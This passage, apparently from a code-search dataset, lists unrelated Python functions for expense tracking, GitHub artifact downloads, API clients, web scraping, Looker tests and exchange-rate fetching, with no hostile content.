logger.info(\"Invalid Source or Symbol\")\n console.print(\"Invalid Source or Symbol\")\n return []\n\n return output", "def get(self) -> list:\n return self.__expedition", "def expenses(self):\n\n return Expenses.objects.filter(\n house=self.house,\n )", "def getExpired(self, idle=365):\n cutOff = datetime.datetime.now() - datetime.timedelta(days=idle)\n return [x for x in self.xeps if x.status == \"Experimental\" and x.date < cutOff]", "def expiry_dates(self):\n try:\n return self._expiry_dates\n except AttributeError:\n # has to be a non-valid date, to trigger returning 'expirations'\n d = self._load_data(dt.datetime(2016, 1, 3))\n self._expiry_dates = [dt.date(x['y'], x['m'], x['d'])\n for x in d['expirations']]\n return self._expiry_dates", "def get_all_explorations():\n return [exp_domain.Exploration(e) for e in\n exp_models.ExplorationModel.get_all()]", "def getExpAccessions(cf):\n\tplatform = cf.get_parameter('platform')\n\tsrafetchxml = cf.get_input('srafetchxml')\n\tsraexplist = cf.get_output('sraexplist')\n\tsraxmlparser = SRAXMLParser()\n\truns = sraxmlparser.parse(srafetchxml)\n\twriter = csv.writer(open(sraexplist, 'wb'), quoting=csv.QUOTE_NONE)\n\twriter.writerow(['NCBISRAExpID'])\n\taccessions = []\n\tfor run in runs:\n\t\tif platform and \\\n\t\t\tnot run.platform == platform:\n\t\t\tcontinue\n\t\telif not run.exp_accession in accessions:\n\t\t\twriter.writerow([run.exp_accession])\n\t\t\taccessions.append(run.exp_accession)\n\tcf.write_log(\"GetExpAccessions: wrote %s experiment accessions\" % len(accessions))\n\treturn constants.OK", "def _getExponentialValues(self, arr):\r\n return [math.exp(val) for val in arr]", "def list(self):\n path = \"authSettings/exemptedUrls\"\n return self._session.get(path)", "def get_artifacts(token, artifact_names, start, end):\n\n artifacts = []\n page = 1\n retry_limit = 3\n while True:\n req = Request(URL + f\"&page={page}\")\n req.add_header(\"Accept\", \"application/vnd.github.v3+json\")\n req.add_header(\"Authorization\", f\"token {token}\")\n with urlopen(req) as r:\n # Handle hitting the GitHub rate limit\n # If the reset time is < 90s in the future, wait for it (trying 3 times)\n # Otherwise raise an error\n if r.status == 403:\n try:\n reset = int(r.headers.get(\"X-RateLimit-Reset\"))\n except:\n raise RuntimeError(\"Hit GitHub rate limit. 
Reset header missing.\")\n if retry_limit == 0 or time.time() > reset or reset - time.time() > 90:\n raise RuntimeError(\"Hit GitHub rate limit. Reset is at %s\" % time.ctime(reset))\n\n # Try waiting until after the reset time\n time.sleep(10 + (reset - time.time()))\n retry_limit = retry_limit - 1\n continue\n\n if r.status != 200:\n raise RuntimeError(\"Error (%d) with API request: %s\" % (r.status, str(r)))\n\n data = json.load(r)\n\n # Only include the artifacts within the date range and names\n for a in data[\"artifacts\"]:\n if a[\"name\"] not in artifact_names:\n continue\n updated_at = datetime.fromisoformat(a[\"updated_at\"][:-1])\n if start <= updated_at <= end:\n artifacts.append(a)\n\n if len(data[\"artifacts\"]) < 100:\n break\n\n # There are more results, get the next page\n page = page + 1\n\n # Avoid hitting per-second rate limits\n time.sleep(2)\n\n return sorted(artifacts, key=lambda x: x[\"updated_at\"])", "def experiences(self):\n return self.client.call('GET',\n self.name + 'experiences')", "def get_option_expirations(\n self, symbol: str, include_all_roots: bool = None, strikes: str = None\n ) -> List[date]:\n url = \"/v1/markets/options/expirations\"\n params = {\n \"symbol\": symbol,\n \"includeAllRoots\": include_all_roots,\n \"strikes\": strikes,\n }\n\n data = self.get(url, params)\n res = MarketsAPIResponse(**data)\n return res.expirations.date", "def return_expenses():\r\n g.db.execute(\"SELECT * FROM monthly_data ORDER BY Sr\")\r\n rows = g.db.fetchall()\r\n data = []\r\n for x in rows:\r\n data.append({'sr':x[0],'name':x[1], 'id':x[2], 'item':x[3], 'price':x[5], 'date':x[4]})\r\n return jsonify(data)", "def test_get_explore_fields_gets_fields(\n fc: fetcher.Fetcher, test_model, test_explores_stats\n):\n test_explore = test_explores_stats[0]\n explore = fc.get_explores(model=test_model[\"name\"], explore=test_explore[\"name\"])\n assert isinstance(explore, list)\n explore = explore[0]\n assert isinstance(explore, models.LookmlModelExplore)\n assert explore.model_name == test_model[\"name\"]\n assert explore.name == test_explore[\"name\"]\n fields = fc.get_explore_fields(explore)\n assert isinstance(fields, list)\n assert fields == test_explore[\"all_fields\"]", "def test_api_can_get_all_expenses(self):\n self.register_user()\n result = self.login_user()\n access_token = json.loads(result.data.decode())['access_token']\n res = self.client().post('/expenses/', headers=dict(Authorization=\"Bearer \" + access_token), data=self.expense)\n self.assertEqual(res.status_code, 201)\n res = self.client().get('/expenses/', headers=dict(Authorization=\"Bearer \" + access_token))\n self.assertEqual(res.status_code, 200)\n results = json.loads(res.data)\n self.assertEqual(results['items'][0]['name'], self.expense['name'])", "def list(self, request):\n currentYear = datetime.now().year\n expenses = Expenses.objects.filter(\n date_purchased__contains=currentYear)\n serializer = ExpenseSerializer(\n expenses, many=True, context={'request': request})\n return Response(serializer.data)", "def get_scans_list(server_url, exp_no, return_list=False):\n if server_url.endswith('/') is False:\n server_url = '%s/' % server_url\n data_dir_url = '%sexp%d/Datafiles' % (server_url, exp_no)\n\n does_exist, raw_lines = check_url(data_dir_url, read_lines=True)\n if does_exist is False:\n return \"Experiment %d's URL %s cannot be found.\" % (exp_no, data_dir_url)\n\n # Scan through the index page\n scan_list = []\n header = 'HB3A_exp%04d_scan' % exp_no\n for line in raw_lines:\n if 
line.count(header) > 0:\n # try to find file HB3A_exp0123_scan6789.dat\n term = line.split(header)[1].split('.dat')[0]\n scan = int(term)\n # check\n if '%04d' % scan == term:\n scan_list.append(scan)\n # END_FOR\n scan_list = sorted(scan_list)\n if return_list is True:\n return scan_list\n\n message = 'Experiment %d: Scan from %d to %d' % (exp_no, scan_list[0], scan_list[-1])\n\n return message", "def get_exchanges():\n url = 'https://help.yahoo.com/kb/finance-for-web/SLN2310.html?impressions=true'\n dataframes = pd.read_html(url)\n return dataframes[0]", "def ListArtifacts(context=None):\n args = artifact_pb2.ApiListArtifactsArgs()\n\n items = context.SendIteratorRequest(\"ListArtifacts\", args)\n return utils.MapItemsIterator(\n lambda data: Artifact(data=data, context=context), items)", "def _CheckExpirations(file_objs):\n expired = []\n unexpired = []\n for file_obj in file_objs:\n if _IsExpired(file_obj):\n expired.append(file_obj)\n else:\n unexpired.append(file_obj)\n return expired, unexpired", "def listExpirationsIntent_handler(handler_input):\n # type: (HandlerInput) -> Response\n logger.info(\"In listExpirations\")\n attributesManager = handler_input.attributes_manager\n try:\n saved_attr = attributesManager.persistent_attributes\n except AttributesManagerException:\n logger.info(\"Persistent Adapter is not defined\")\n logger.info(\"After getting persistent attributes\")\n if saved_attr == {}:\n speech = \"La lista e' vuota.\"\n else:\n speech=\"\"\n for k in saved_attr.keys():\n speech += saved_attr[k]['object']+\" scadra' il giorno \"+saved_attr[k]['expiration']+\". \"\n \n handler_input.response_builder.set_should_end_session(True)\n handler_input.response_builder.speak(speech)\n return handler_input.response_builder.response", "def test_obtain_issues(self, mock_url_read):\n mock_url_read.side_effect = [LAST_SCAN, '{\"reportId\": 22}', '{\"status\": {\"value\": \"Created\"}}',\n SAST_REPORT.format(false_positive=False, severity='High')]\n\n self.__report.obtain_issues(['id'], 'high')\n issues = self.__report.issues()\n\n self.assertIsInstance(issues, List)\n self.assertIsInstance(issues[0], Checkmarx.Issue)\n self.assertEqual('JScript Vulnerabilities', issues[0].group)\n self.assertEqual('Reflected XSS', issues[0].title)\n self.assertEqual('http://url/CxWebClient/ScanQueryDescription.aspx?queryID=789&'\n 'queryVersionCode=842956&queryTitle=Reflected_XSS', issues[0].display_url)\n self.assertEqual(1, issues[0].count)\n self.assertEqual(\"Recurrent\", issues[0].status)", "def living_expenses(self):\n # Prepare arguments for call to `living_expenses_strategy`\n # NOTE: This is a pretty brittle way to determine the\n # retirement year. 
Issues #15 and #28 will require this\n # code to be changed in a future version.\n retirement_year = min(\n person.retirement_date.year for person in self.people)\n return self.living_expenses_strategy(\n year=self.this_year,\n people=self.people,\n retirement_year=retirement_year)", "def get_all_images(access_token):\n url = 'http://interview.agileengine.com/images'\n headers = {\n 'Authorization': 'Bearer ' + access_token\n }\n images = []\n try:\n logging.info(\"Fetching all the images\")\n response = requests.get(\n url,\n headers=headers\n )\n if response.ok: \n total_pages = response.json().get('pageCount')\n images = response.json().get('pictures')\n logging.info(f\"fetched 1 of {total_pages}\")\n for i in range(2,total_pages + 1):\n paginated_url = f'http://interview.agileengine.com/images?page={i}'\n response = requests.get(\n paginated_url,\n headers=headers\n )\n images += response.json().get('pictures')\n logging.info(f\"fetched {i} of {total_pages}\")\n \n detailed_images = []\n for image in images:\n detail_url = f\"http://interview.agileengine.com/images/{image.get('id')}\"\n \n logging.info(f\"Retrieving detail of {image['id']}\")\n response = requests.get(\n detail_url,\n headers=headers\n )\n if response.ok:\n detailed_images.append(response.json())\n return detailed_images\n except requests.exceptions.HTTPError:\n logging.exception('HTTP error')\n except requests.exceptions.ConnectionError:\n logging.exception('Connection error')\n except requests.exceptions.Timeout:\n logging.exception('Timeout error')\n except requests.exceptions.RequestException as e:\n logging.exception('Unexpected error')", "def test_get_list_most_expensive(self):\n\n expensive_goods_test = self.info_list.get_list_most_expensive()\n most_expensive_test = self.form_expensive_list_goods()\n\n self.assertEqual(expensive_goods_test, most_expensive_test)", "def test_get_explore_field_stats(\n fc: fetcher.Fetcher,\n looker_sdk: methods.Looker40SDK,\n test_model,\n test_used_explore_names,\n test_explores_stats,\n):\n explore = fc.get_explores(\n model=test_model[\"name\"], explore=test_used_explore_names[0]\n )[0]\n actual_stats = fc.get_explore_field_stats(explore)\n assert isinstance(actual_stats, dict)\n\n for e in test_explores_stats:\n if e[\"name\"] == test_used_explore_names[0]:\n expected_stats = e\n\n assert all(actual_stats[k] == 0 for k in expected_stats[\"unused_fields\"])\n assert all(actual_stats[k] > 0 for k in expected_stats[\"used_fields\"])", "def set_list_of_expenses(self):\n fix_exp = DB.get_fixed_expenses(self.customer.email)\n var_exp = DB.get_variable_expenses(self.customer.email)\n self.listOfExpensesSEK.item(2).setText(str(fix_exp[\"subscription\"]))\n self.listOfExpensesSEK.item(3).setText(str(fix_exp[\"insurance\"]))\n self.listOfExpensesSEK.item(4).setText(str(fix_exp[\"rent\"]))\n self.listOfExpensesSEK.item(5).setText(str(fix_exp[\"others\"]))\n\n self.listOfExpensesSEK.item(11).setText(str(var_exp[\"food\"]))\n self.listOfExpensesSEK.item(12).setText(str(var_exp[\"bills\"]))\n self.listOfExpensesSEK.item(13).setText(str(var_exp[\"transportation\"]))\n self.listOfExpensesSEK.item(14).setText(str(var_exp[\"hygien\"]))\n self.listOfExpensesSEK.item(15).setText(str(var_exp[\"clothes\"]))\n self.listOfExpensesSEK.item(16).setText(str(var_exp[\"entertainment\"]))\n self.listOfExpensesSEK.item(17).setText(str(var_exp[\"others\"]))", "def set_list_of_expenses(self):\n fix_exp = DB.get_fixed_expenses(self.customer.email)\n var_exp = DB.get_variable_expenses(self.customer.email)\n 
self.listOfExpensesSEK.item(2).setText(str(fix_exp[\"subscription\"]))\n self.listOfExpensesSEK.item(3).setText(str(fix_exp[\"insurance\"]))\n self.listOfExpensesSEK.item(4).setText(str(fix_exp[\"rent\"]))\n self.listOfExpensesSEK.item(5).setText(str(fix_exp[\"others\"]))\n\n self.listOfExpensesSEK.item(11).setText(str(var_exp[\"food\"]))\n self.listOfExpensesSEK.item(12).setText(str(var_exp[\"bills\"]))\n self.listOfExpensesSEK.item(13).setText(str(var_exp[\"transportation\"]))\n self.listOfExpensesSEK.item(14).setText(str(var_exp[\"hygien\"]))\n self.listOfExpensesSEK.item(15).setText(str(var_exp[\"clothes\"]))\n self.listOfExpensesSEK.item(16).setText(str(var_exp[\"entertainment\"]))\n self.listOfExpensesSEK.item(17).setText(str(var_exp[\"others\"]))", "def test_get_explores_throws_if_model_or_explore_does_not_exist(\n fc: fetcher.Fetcher, model: Optional[str], explore: Optional[str], msg: str\n):\n with pytest.raises(exceptions.NotFoundError) as exc:\n fc.get_explores(model=model, explore=explore)\n assert msg in str(exc.value)", "def list(self, request):\n exp = Experiment.objects.all()\n serializer = ExperimentSerializer(exp, many=True)\n return send_response(request.method, serializer)", "def list_of_exchanges(test_mode: bool = False) -> list:\n try:\n return ListOfExchanges(test_mode=test_mode)\n except Exception as exception:\n logger.error('Oops! An error Occurred ⚠️')\n raise exception", "def get_all(self):\n total_expense_reports = []\n get_count = {\n 'query': {\n 'object': 'EEXPENSES',\n 'select': {\n 'field': 'RECORDNO'\n },\n 'pagesize': '1'\n }\n }\n\n response = self.format_and_send_request(get_count)\n count = int(response['data']['@totalcount'])\n pagesize = 2000\n offset = 0\n for i in range(0, count, pagesize):\n data = {\n 'query': {\n 'object': 'EEXPENSES',\n 'select': {\n 'field': [\n 'RECORDNO',\n 'RECORDID',\n 'WHENCREATED',\n 'WHENPOSTED',\n 'TOTALENTERED',\n 'STATE',\n 'TOTALDUE',\n 'DESCRIPTION',\n 'CURRENCY',\n 'BASECURR',\n 'MEMO'\n ]\n },\n 'pagesize': pagesize,\n 'offset': offset\n }\n }\n expense_reports = self.format_and_send_request(data)['data']['EEXPENSES']\n total_expense_reports = total_expense_reports + expense_reports\n offset = offset + pagesize\n return total_expense_reports", "def get_sites():\n results = __gae_fetch('https://api.stackexchange.com/%s/sites?pagesize=999&key=%s' % (__api_version, api_key))\n response = simplejson.loads(results.content)\n return response", "def _extract_articles(self, target):\n feed_response, modified, etag = self._get_recent_feed(target)\n\n # Bozo is a tag which tells that the RSS hasn't been parsed correctly.\n if feed_response.bozo:\n exc = feed_response.bozo_exception\n if not isinstance(exc, self.ALLOWED_EXCEPTIONS):\n raise exc\n\n articles = []\n count = 0\n if self._manage_status(feed_response, target):\n for feed_entry in feed_response.entries:\n if self._limit and count >= self._limit:\n logging.info(\n \"Crawling limit of %d article(s) was reached for this target.\",\n count\n )\n break\n try:\n article = self.extract_article(feed_entry, target)\n except Exception as exc:\n # NOTE(cmiN): On Stackdriver Error Reporting we don't want to catch\n # (with `logging.exception`) \"Not Found\" errors, because they are\n # pretty frequent and usual, therefore ignore-able.\n log_function = (\n logging.error if \"404\" in str(exc) else logging.exception\n )\n log_function(\"Got %s while parsing %r.\", exc, feed_entry.id)\n else:\n articles.append(article)\n count += 1\n target.checkpoint(modified, etag)\n\n 
return articles", "def impressions(self):\r\n return resource.Impressions(self)", "async def delete_expired_responses(self):\n logger.info(f'Deleting all responses more than {self.expire_after} hours old')\n keys_to_delete = set()\n\n for key in await self.responses.keys():\n response = await self.get_response(key)\n if response and response.is_expired:\n keys_to_delete.add(key)\n\n logger.info(f'Deleting {len(keys_to_delete)} expired cache entries')\n for key in keys_to_delete:\n await self.delete(key)", "def ListSpires(self, request, context):\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')", "def list_extractors(age_limit=None):\n return [ie() for ie in list_extractor_classes(age_limit)]", "def retrieve_closed_issues(self):\n return self._retrieve_issues(\"closed\")", "def get_price_list(self):\n # Fetch the resource info then get a copy of it\n self._res_man.collect_resource_info()\n res_list = self._res_man.get_resource_info()\n # Pack the price response!\n price_response = PriceResponse()\n for res in res_list:\n price = res.post_price()\n res_type = res.get_res_type()\n if res_type == ResourceType.LINK:\n src_zone_id, dst_zone_id = res.get_src_and_dst()\n price_response.add_link_price(\n src_zone_id,\n dst_zone_id,\n price,\n res.get_max_valuation()\n )\n else:\n price_response.add_resource_price(\n res.get_zone_id(),\n res_type,\n price,\n res.get_max_valuation()\n )\n # Save prices for later, if needed\n if self._use_price_token:\n # Generate token\n self._num_req += 1\n token = hash(str(self._num_req))\n price_response.set_price_token(token)\n # Get mapping\n price_mapping = self._res_man.get_res_to_price_mapping()\n # Get priority\n pri = time() + self._token_duration\n with self._history_lock:\n self._hist_q.put((pri, token))\n self._price_history[token] = price_mapping\n logger.debug(\n f'Saved prices with token {token} '\n f'for {self._token_duration} seconds'\n )\n return price_response", "def get_epic_children(self) -> list:\n\n children = [i['key'] for i in self.repo.api_call(requests.get, f\"search?jql=cf[10008]='{self.jira_key}'\")['issues']]\n return children", "def __getLuredExpInfo(self, suitId):\n returnInfo = []\n lurers = self.__getLurers(suitId)\n if len(lurers) == 0:\n return returnInfo\n lurerInfo = self.currentlyLuredSuits[suitId][3]\n for currLurer in lurers:\n returnInfo.append([currLurer,\n lurerInfo[currLurer][0],\n lurerInfo[currLurer][1],\n lurerInfo[currLurer][2],\n ])\n return returnInfo", "def get(self, updated_at=None, settled_at=None, reimbursed_at=None, approved_at=None, state=None, offset=None,\n verified=None, limit=None, fund_source=None, settlement_id=None):\n return self._get_request({\n 'updated_at': updated_at,\n 'offset': offset,\n 'limit': limit,\n 'settled_at': settled_at,\n 'reimbursed_at': reimbursed_at,\n 'approved_at': approved_at,\n 'state': state,\n 'verified': verified,\n 'fund_source': fund_source,\n 'settlement_id': settlement_id\n }, Expenses.GET_EXPENSES)", "def _count_explores(self) -> int:\n explore_count = 0\n for model in self.project.models:\n explore_count += len(model.explores)\n return explore_count", "def test_obtain_issues_exclude_false_positives(self, mock_url_read):\n mock_url_read.side_effect = [LAST_SCAN, '{\"reportId\": 22}', '{\"status\": {\"value\": \"Created\"}}',\n SAST_REPORT.format(false_positive=True, severity='High')]\n self.__report.obtain_issues(['id'], 'high')\n issues = self.__report.issues()\n 
self.assertIsInstance(issues, List)\n self.assertEqual(len(issues), 0)", "def get_public_explorations():\n return [exp_domain.Exploration(e) for e in\n exp_models.ExplorationModel.get_public_explorations()]", "def test_get_historical_prices(self, mock_requests_get):\n from grand_exchanger.resources.graph import Graph\n\n result = resources.get_historical_prices(1)\n\n assert result == Graph(\n daily={\n datetime(2020, 7, 27, 0, 0): 100,\n datetime(2020, 7, 26, 0, 0): 120,\n datetime(2020, 7, 25, 0, 0): 110,\n },\n average={\n datetime(2020, 7, 27, 0, 0): 100,\n datetime(2020, 7, 26, 0, 0): 110,\n datetime(2020, 7, 25, 0, 0): 104,\n },\n )", "def fetch_gene_descriptions(self, metrics, coeff='cohen', nih_fetch_num=20, alpha=.05, **kwargs):\n if 'verbose' not in kwargs:\n kwargs['verbose'] = True\n if 'nih_dl' not in kwargs:\n kwargs['nih_dl'] = False\n\n if kwargs['nih_dl'] == False:\n if 'csv_path' not in kwargs:\n raise ValueError(\"'csv_path' argument in **kwargs missing; provide argument or use 'nih_dl':True .\")\n\n top_genes = []\n if coeff == 'cohen':\n # Checking if users mixed up coeff/metric parameters\n if isinstance(metrics, list):\n raise ValueError(\"list passed with coeff='cohen'; if you want to use Spearman's Rho use coeff='spearman'.\")\n\n for rec in metrics['results'][:nih_fetch_num]:\n try:\n if kwargs['nih_dl']:\n gene_name, gene_description = gene_info(str(rec.entrez))\n else:\n gene_dat = get_local_gene_info(kwargs['csv_path'], [rec.entrez])\n gene_name = gene_dat[0].name\n gene_description = gene_dat[0].description\n top_genes.append((rec.entrez, rec.cohen_d, rec.p_value, gene_name, gene_description))\n except IndexError:\n continue\n\n if kwargs['verbose']:\n print \"\\nCorrected Bonferroni Alpha: %.3E\\n\\n\" % (alpha / float(metrics['gene_sample_size']))\n for eid, coh_d, p_val, gene_i, descr in top_genes:\n if len(descr) == 1:\n print \"%d (p = %.3E; d = %.3f): < No description found >\\n\\n\" % (eid, p_val, coh_d)\n else:\n print \"%d (p = %.3E; d = %.3f): %s\\n\\n\" % (eid, p_val, coh_d, descr)\n elif coeff == 'spearman':\n # Checking if users mixed up coeff/metric parameters\n if isinstance(metrics, dict):\n raise ValueError(\"dict passed with coeff='spearman'; if you want to use Cohen's d use coeff='cohen'.\")\n\n top_ids = np.argsort(metrics)[:nih_fetch_num]\n\n top_rs = [r for r in reversed(np.sort(metrics))][:nih_fetch_num]\n top_genes = []\n for x in xrange(len(top_ids)):\n try:\n if kwargs['nih_dl']:\n gene_name, gene_description = gene_info(str(top_ids[x]))\n else:\n gene_dat = get_gene_info(kwargs['csv_path'], [top_ids[x]])\n gene_name = gene_dat[0].name\n gene_description = gene_dat[0].description\n top_genes.append((int(top_ids[x]), top_rs[x], gene_name, gene_description))\n except IndexError:\n continue\n\n if kwargs['verbose']:\n print \"\\nCorrected Bonferroni Alpha: %.3E\\n\\n\" % (alpha/float(len(self.no.ge.keys())))\n for eid, rho, gene_i, descr in top_genes:\n if len(descr) == 1:\n print \"%d (r = %.3f): < No description found >\\n\\n\" % (eid, rho)\n else:\n print \"%d (r = %.3f): %s\\n %s\\n\\n\" % (eid, rho, gene_i, descr)\n\n else:\n raise ValueError(\"Invalid parameter value for 'coeff'; use 'spearman' or 'cohen'.\")\n\n return top_genes", "def test_get_urls(self):\r\n OFFER_URLS = [\"http://olx.pl/offer1\",\r\n \"http://olx.pl/offer2\",\r\n \"http://olx.pl/offer3\",\r\n \"http://olx.pl/offer4\",\r\n \"http://olx.pl/offer5\",\r\n \"http://olx.pl/offer6\"]\r\n\r\n SEARCH_QUERY = \"http://SEARCH_QUERY_URL?\"\r\n \r\n for url in 
OfferSearcher.search(SEARCH_QUERY, 6, WebDocumentFetcherStub):\r\n self.assertTrue(url in OFFER_URLS, \"Unexpected offer url fetched: %s\" % url)\r\n OFFER_URLS.remove(url)\r\n \r\n self.assertEquals(0, len(OFFER_URLS), \"Not all offer urls fetched: %s\" % OFFER_URLS)", "def get_requests(url, user, passwd):\n \n #get\n r = requests.get(url, auth=HTTPBasicAuth(user, passwd))\n \n #if timout\n if r.status_code == 403:\n print(\"LIMIT EXCEEDED\")\n print(\"WAIT AN HOUR\")\n i=1\n while r.status_code != 200:\n time.sleep(60)\n r = requests.get(url, auth=HTTPBasicAuth(user, passwd))\n print(\"{} MINUTES ELAPSED\".format(i))\n i+=1\n elif r.status_code != 200:\n print(r.status_code)\n return []\n #return data\n data = r.json()\n return data", "def extract_listings(page_url, attempts=10):\r\n \r\n listings_max = 0\r\n listings_out = [BeautifulSoup('', features='html.parser')]\r\n for idx in range(attempts):\r\n try:\r\n answer = requests.get(page_url, timeout=5)\r\n content = answer.content\r\n soup = BeautifulSoup(content, features='html.parser')\r\n listings = soup.findAll(\"div\", {\"class\": \"_gig1e7\"})\r\n except:\r\n # if no response - return a list with an empty soup\r\n listings = [BeautifulSoup('', features='html.parser')]\r\n\r\n if len(listings) == 20:\r\n listings_out = listings\r\n break\r\n\r\n if len(listings) >= listings_max:\r\n listings_max = len(listings)\r\n listings_out = listings\r\n\r\n return listings_out", "def fetch_and_store_latest_ecb_exrates():\n response = requests.get(DAILY_ECB_URL)\n # Raise exception if status_code != 200 or ConnectionError\n response.raise_for_status()\n info = ET.fromstring(response.content)[2][0]\n datestamp = datetime.strptime(info.attrib['time'], \"%Y-%m-%d\").date()\n rates = [x.attrib for x in info]\n\n exrates = []\n for item in rates:\n if item['currency'] in SUPPORTED_CURRENCIES:\n exrate, created = ExchangeRate.objects.update_or_create(\n datestamp=datestamp,\n currency=item['currency'],\n defaults={'rate': Decimal(item['rate'])}\n )\n exrates.append(exrate)\n print(exrate, \"NEW EXRATE!\" if created else \"<noupdate>\")\n\n return exrates", "def getExpires(self):\n return self.base.get(\"expires\", [])", "def get_objectives(data):\n objectives = [math.log(population[0][\"objective\"]) for population in data]\n # objectives = [population[0][\"objective\"] for population in data]\n return objectives", "async def get_invites(self) -> 'typing.List[dt_invite.Invite]':\n invites = await self._bot.http.get_invites_for(self.id)\n invites = [dt_invite.Invite(self._bot, **i) for i in invites]\n\n try:\n invite = await self.get_vanity_invite()\n except (CuriousError, HTTPException):\n pass\n else:\n if invite is not None:\n invites.append(invite)\n\n return invites", "def test_codigo_exp(self):\n response = self.client.get('/apirest/expedientes/?codigoExp=0019-JGM-2014')\n self.assertEqual(response.status_code, self.CODIGO_EXITO)\n self.assertEqual(response.data[\"count\"], 1)\n self.assertEqual(response.data[\"results\"][0][\"tipocamara\"], self.TIPO_CAMARA)\n self.assertEqual(response.data[\"results\"][0][\"voces\"], self.RANGO_FECHAS_VOCES)", "def test_obtain_issues_http_error(self, mock_url_read):\n mock_url_read.side_effect = urllib.error.HTTPError('raise', None, None, None, None)\n self.__report.obtain_issues(['id'], 'high')\n issues = self.__report.issues()\n self.assertIsInstance(issues, List)\n self.assertEqual(len(issues), 0)", "async def get_issues(self) -> [\"AIOGitHubAPIRepositoryIssue\"]:\n _endpoint = 
f\"/repos/{self.full_name}/issues\"\n\n response = await self.client.get(endpoint=_endpoint)\n return [AIOGitHubAPIRepositoryIssue(self.client, x) for x in response or []]", "def get_expense(self, resp):\n expense = resp['expense']\n expense_obj = Expense()\n expense_obj.set_expense_id(expense['expense_id'])\n expense_obj.set_expense_item_id(expense['expense_item_id'])\n expense_obj.set_account_id(expense['account_id'])\n expense_obj.set_account_name(expense['account_name'])\n expense_obj.set_paid_through_account_id(expense[\\\n 'paid_through_account_id'])\n expense_obj.set_paid_through_account_name(expense[\\\n 'paid_through_account_name'])\n expense_obj.set_vendor_id(expense['vendor_id'])\n expense_obj.set_vendor_name(expense['vendor_name'])\n expense_obj.set_date(expense['date'])\n expense_obj.set_tax_id(expense['tax_id'])\n expense_obj.set_tax_name(expense['tax_name'])\n expense_obj.set_tax_percentage(expense['tax_percentage'])\n expense_obj.set_currency_id(expense['currency_id'])\n expense_obj.set_currency_code(expense['currency_code'])\n expense_obj.set_exchange_rate(expense['exchange_rate'])\n expense_obj.set_tax_amount(expense['tax_amount'])\n expense_obj.set_sub_total(expense['sub_total'])\n expense_obj.set_total(expense['total'])\n expense_obj.set_bcy_total(expense['bcy_total'])\n expense_obj.set_amount(expense['amount'])\n expense_obj.set_is_inclusive_tax(expense['is_inclusive_tax'])\n expense_obj.set_reference_number(expense['reference_number'])\n expense_obj.set_description(expense['description'])\n expense_obj.set_is_billable(expense['is_billable'])\n expense_obj.set_customer_id(expense['customer_id'])\n expense_obj.set_customer_name(expense['customer_name'])\n expense_obj.set_expense_receipt_name(expense['expense_receipt_name'])\n expense_obj.set_created_time(expense['created_time'])\n expense_obj.set_last_modified_time(expense['last_modified_time'])\n expense_obj.set_status(expense['status'])\n expense_obj.set_invoice_id(expense['invoice_id'])\n expense_obj.set_invoice_number(expense['invoice_number'])\n expense_obj.set_project_id(expense['project_id'])\n expense_obj.set_project_name(expense['project_name'])\n return expense_obj", "def scrape_issues(self, url):\n try:\n self.driver.get(url)\n except common.exceptions.InvalidSessionIdException:\n self.driver.close()\n error_message = \"ERROR: Failed to reach URL, check \"\\\n \"specified URL in constants.py\\n\"\n self.logger.log(error_message)\n return []\n except Exception:\n self.driver.close()\n error_message = \"ERROR: Failed to reach URL, check \"\\\n \"specified URL in constants.py\\n\"\n self.logger.log(error_message)\n return []\n\n source_html = self.driver.page_source\n soup = BeautifulSoup(source_html, \"html.parser\")\n page_title = soup.title.string\n buganizer_issues = []\n\n if \"Buganizer\" not in page_title or \"componentid\" not in page_title:\n if \"MOMA Single Sign On\" in page_title:\n error_message = \"ERROR: You must log into your MOMA account \"\\\n \"first. 
Select the 'Use Security Code' option and generate a security code at go/sc.\\n\"\n self.logger.log(error_message)\n\n while \"Buganizer\" not in page_title:\n source_html = self.driver.page_source\n soup = BeautifulSoup(source_html, \"html.parser\")\n page_title = soup.title.string\n time.sleep(1)\n\n return buganizer_issues\n error_message = \"ERROR: URL does not link to a Buganizer \"\\\n \"componentid, check specified URL \"\\\n \"in constants.py\\n\"\n self.logger.log(error_message)\n return buganizer_issues\n\n for tbody in soup.find_all('tbody'):\n for _tr in tbody.find_all('tr'):\n issue_link = \"https://b.corp.google.com/issues/\" + _tr.get(\n 'data-row-id')\n buganizer_issues.append(issue_link)\n return buganizer_issues", "def get_employees(self):\n return self.employees", "async def get_ff_emotes():\n\n redis = await aioredis.create_redis_pool(REDIS)\n value = await redis.hgetall(\"ff_emotes\", encoding=\"utf-8\")\n\n redis.close()\n await redis.wait_closed()\n return value;", "def get_haberes_exentos(self):\n return float(\n self.input.get_text(liquidaciones_historicas_catalog.HABERES_EXENTOS).replace(\".\", \"\").replace(\",\", \".\"))", "def fetch_alerts_related_incident(client: Client, incident_id: str, max_alerts: int) -> list[dict[str, Any]]:\n alerts: list[dict] = []\n has_next = True\n page_number = 0\n while has_next and len(alerts) < max_alerts:\n demisto.debug(f\"fetching alerts, {page_number=}\")\n try:\n response_body = client.incident_list_alerts_request(\n page_number=str(page_number),\n id_=incident_id,\n page_size=None\n )\n except HTTPError as e:\n if e.response is not None and e.response.status_code == 429:\n raise DemistoException(\n 'Too many requests, try later or reduce the number of Fetch Limit parameter.'\n ) from e\n raise e\n\n except Exception:\n demisto.error(f\"Error occurred while fetching alerts related to {incident_id=}. 
{page_number=}\")\n raise\n\n items = response_body.get('items', [])\n alerts.extend(items[:max_alerts - len(alerts)])\n page_number += 1\n has_next = response_body.get('hasNext', False)\n\n return alerts", "def get_list_of_results(url, regex, max_retries=10, auth=('', '')):\n resultslist = []\n for _ in range(max_retries):\n page = requests.get(url, auth=auth)\n if not page.status_code==200:\n time.sleep(5)\n continue\n else:\n break\n if not regex is None:\n for m in re.finditer(regex, str(page.content)):\n resultslist.append(m.group(1))\n else:\n resultslist = page.text.split(\"\\n\")\n resultslist = list(filter(None, resultslist))\n return resultslist, len(resultslist)", "def get(self, expense_id):\n url = base_url + expense_id\n resp = zoho_http_client.get(url, self.details, self.headers)\n return parser.get_expense(resp)", "def get_experience(self):\n return self.experience_set.all()", "def test_url_risklist_gzip(self):\n client = ConnectApiClient()\n resp = client.get_url_risklist(gzip=True)\n buf = io.BytesIO()\n for itr in resp.iter_content(chunk_size=1024):\n buf.write(itr)\n buf.seek(0)\n self.assertGreater(len(buf.read()), 1000)\n buf.close()", "def get_incidents(self) -> tuple[list[Any], Any, Any | None]:\n timestamp = None\n fetch_limit = arg_to_number(self.fetch_limit)\n fetch_time 